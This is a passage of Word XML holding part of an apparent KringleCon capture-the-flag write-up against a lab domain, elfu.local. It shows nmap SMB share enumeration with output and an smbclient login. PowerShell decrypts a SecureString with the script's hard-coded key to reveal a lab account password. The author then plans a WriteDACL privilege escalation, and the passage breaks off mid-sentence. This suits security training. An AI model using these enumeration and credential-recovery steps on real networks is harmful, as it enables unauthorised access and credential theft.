    <w:p w14:paraId="14C0FD9D" w14:textId="0C66C612" w:rsidR="005558C2" w:rsidRDefault="005558C2" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">Since I wasn’t making progress on this front, I moved back to enumeration phase. Understanding that I needed to find a file, </w:t>
      </w:r>
      <w:r w:rsidR="00521837">
        <w:t xml:space="preserve">I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00521837">
        <w:t>nmap’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00521837">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00521837" w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>smb-enum-shares.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00521837">
        <w:t xml:space="preserve"> script to get details on any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00521837">
        <w:t>fileshares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00521837">
        <w:t xml:space="preserve"> accessible on the network. It turns out, I was pre-mature in writing off 10.128.2.0/23 as purely user space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24053774" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb-enum-shares.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p 445 10.128.2.0/23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D30D5" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB75776" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 10.128.3.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A31BE9" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00071s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0372B5E1" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B8325B" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F70C10C" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AACA18" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A17C14D" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F84DC" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-shares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778B640" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>account_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: &lt;blank&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF49649" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|   \\10.128.3.30\IPC$:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E362A9D" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Type: STYPE_IPC_HIDDEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D9670" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Comment: IPC Service (Samba 4.3.11-Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07511285" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Users: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4024E6" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Max Users: &lt;unlimited&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D46851" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Path: C:\tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2C053" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Anonymous access: READ/WRITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6288DBE9" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|   \\10.128.3.30\elfu_svc_shr:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3769567B" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Type: STYPE_DISKTREE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27888B" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|     Comment: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu_svc_shr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AAE30DD" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Users: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57954522" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Max Users: &lt;unlimited&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A01B2" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Path: C:\elfu_svc_shr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6FC310" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Anonymous access: &lt;none&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139AF589" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|   \\10.128.3.30\netlogon:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA4F81" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Type: STYPE_DISKTREE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E58CD51" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Comment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9AB3E" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>|     Users: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BB2517" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Max Users: &lt;unlimited&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348ACCB5" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Path: C:\var\lib\samba\sysvol\elfu.local\scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBFE11" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Anonymous access: &lt;none&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AEA280" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|   \\10.128.3.30\research_dep:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339CD78D" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Type: STYPE_DISKTREE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230607E7" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|     Comment: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>research_dep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3969EDED" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Users: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9821A" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Max Users: &lt;unlimited&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4660F397" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Path: C:\research_dep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106DC106" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Anonymous access: &lt;none&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D92BC80" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|   \\10.128.3.30\sysvol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6156529D" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Type: STYPE_DISKTREE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC4240" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Comment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36767CB3" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Users: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9AA4A2" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Max Users: &lt;unlimited&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AAD13E" w14:textId="77777777" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|     Path: C:\var\lib\samba\sysvol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC94FAB" w14:textId="681DB130" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>|_    Anonymous access: &lt;none&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623684F" w14:textId="276591CA" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="00521837"/>
    <w:p w14:paraId="7E96CC38" w14:textId="4E9E0BA8" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="00521837">
      <w:r>
        <w:t>The “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>elfu_svc_shr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” immediately stood out and I connected to it via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20321622" w14:textId="30773F30" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00521837">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00521837">
        <w:t xml:space="preserve"> \\\\10.128.3.30\\elfu_svc_shr -W </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00521837">
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00521837">
        <w:t xml:space="preserve"> -U </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00521837">
        <w:t>elfu_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D541EAF" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00521837"/>
    <w:p w14:paraId="69BFE608" w14:textId="6FBF6A0B" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="00521837">
      <w:r>
        <w:t xml:space="preserve">The share was filled scripts, so I downloaded them all and began sifting through them with </w:t>
      </w:r>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:t>. “Password” was too loud of a query with too many false positives. To cut through the noise, I searched for “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” instead. I figured this one would find things that were put here deliberately and crafted by hand, not catch default documentation or help in all these scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4EAC30" w14:textId="4037481D" w:rsidR="00521837" w:rsidRDefault="00521837" w:rsidP="00521837">
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00AF47BA">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00AF47BA" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>GetProcessInfo.ps1</w:t>
      </w:r>
      <w:r w:rsidR="00AF47BA">
        <w:t>” script configures the credentials for a user “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF47BA">
        <w:t>remote_elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF47BA">
        <w:t>” and includes credentials that are obfuscated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D65AAD" w14:textId="0F004C61" w:rsidR="00AF47BA" w:rsidRDefault="00AF47BA" w:rsidP="00521837">
      <w:r>
        <w:t xml:space="preserve">First, before doing anything with the script, I checked </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote_elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in Bloodhound. The user has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>writedacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permissions on the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>researchdepartment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” group, which is likely used for access to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:t>\\10.128.3.30\research_dep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and probably contains our target file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4137239F" w14:textId="42A3D1F3" w:rsidR="00521837" w:rsidRDefault="0053096A" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">The script avoids putting the plaintext password in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>GetProcessInfo.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> script by storing it as a secure string. Using the same native functions used in the script to store and use the password, we can have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output the password as plain text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1F21D" w14:textId="75831804" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecStringPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24721003" w14:textId="413D4930" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecStringPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConvertTo-SecureString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD15E3" w14:textId="672D9A77" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConvertFrom-SecureString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AsPlainText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="055D0424" w14:textId="5B8BB3E0" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>A1d655f7f5d98b10!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198080C1" w14:textId="71D8208F" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="0053096A"/>
    <w:p w14:paraId="0B6613DA" w14:textId="1BA320A2" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="0053096A">
      <w:r>
        <w:t xml:space="preserve">I tested the credentials and confirmed that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote_elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can be used with the password “A1d655f7f5d98b10!” to access the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C27B796" w14:textId="3CF49268" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="0053096A">
      <w:r>
        <w:t xml:space="preserve">I needed to get to a place that I could leverage the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>writedacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> right granted to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote_elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>researchdepartment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00144582">
        <w:t xml:space="preserve">In his </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00144582">
        <w:t>Kringlecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00144582">
        <w:t xml:space="preserve"> 2021 talk</w:t>
      </w:r>
      <w:r w:rsidR="006439C8">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00C60537" w:rsidRPr="00BB1C6B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=iMh8FTzepU4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006439C8">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00144582">
        <w:t xml:space="preserve">, Chris Davis uses assemblies native to Windows to create and apply ACE entries to a vulnerable object. It was too difficult to do this from Linux using the </w:t>
      </w:r>
      <w:r w:rsidR="00144582" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ldap3</w:t>
      </w:r>
      <w:r w:rsidR="00144582">
        <w:t xml:space="preserve"> library with python, so I tried to access the domain controller again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214DE48E" w14:textId="5DC9008C" w:rsidR="00144582" w:rsidRDefault="00144582" w:rsidP="0053096A">
      <w:r>
        <w:t xml:space="preserve">Whether this was unique to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote_elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or a failure on my part, I was finally able to access dc01.elfu.local via </w:t>
